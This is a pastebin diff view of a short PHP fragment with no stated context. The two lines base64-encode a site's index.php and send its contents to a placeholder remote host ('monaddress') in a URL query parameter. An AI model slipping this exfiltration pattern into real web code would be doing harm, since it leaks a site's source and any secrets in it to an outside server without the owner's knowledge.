Facebook
From Speedy Motmot, 4 Years ago, written in Plain Text.
This paste is a reply to Re: Untitled from Beige Hog - go back
Embed
Viewing differences between Re: Untitled and Re: Re: Untitled
        $myindex = base64_encode(file_get_contents('index.php'));
        echo file_get_contents('http://monaddress/test.php?myindex='.$myindex);
?>